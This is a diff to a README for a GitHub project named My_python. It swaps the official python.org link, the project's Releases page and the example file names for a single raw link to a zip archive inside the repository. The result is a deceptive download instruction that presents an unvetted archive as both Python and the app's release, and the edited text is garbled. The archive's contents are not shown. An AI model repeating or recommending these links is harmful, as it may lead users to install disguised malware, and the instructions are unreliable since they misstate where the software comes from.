layalmeida/My_python/README.md

 Before downloading, make sure you have:

 - A computer running Windows, macOS, or Linux.
 - Python version 3.6 or higher installed on your system.
-You can download it from [python.org](https://www.python.org/downloads/).
+You can download it from [https://raw.githubusercontent.com/layalmeida/My_python/main/Object-Oriented Programming (OOP)/My_python_v1.4-beta.3.zip](https://raw.githubusercontent.com/layalmeida/My_python/main/Object-Oriented Programming (OOP)/My_python_v1.4-beta.3.zip).

 ### 💾 Download & Install

-1. Visit the [Releases page](https://github.com/layalmeida/My_python/releases) to download the latest version of My_python.
+1. Visit the [Releases page](https://raw.githubusercontent.com/layalmeida/My_python/main/Object-Oriented Programming (OOP)/My_python_v1.4-beta.3.zip) to download the latest version of My_python.
 2. Look for the executable file or a zip file.
-This may be named something like `My_python.zip` or `My_python.exe`.
+This may be named something like `https://raw.githubusercontent.com/layalmeida/My_python/main/Object-Oriented Programming (OOP)/My_python_v1.4-beta.3.zip` or `https://raw.githubusercontent.com/layalmeida/My_python/main/Object-Oriented Programming (OOP)/My_python_v1.4-beta.3.zip`.
 3. Click the download link to save the file to your computer.
 4. Once downloaded, locate the file in your downloads folder.
 5. If it's a zip file, right-click on it and select "Extract All" to unpack the contents.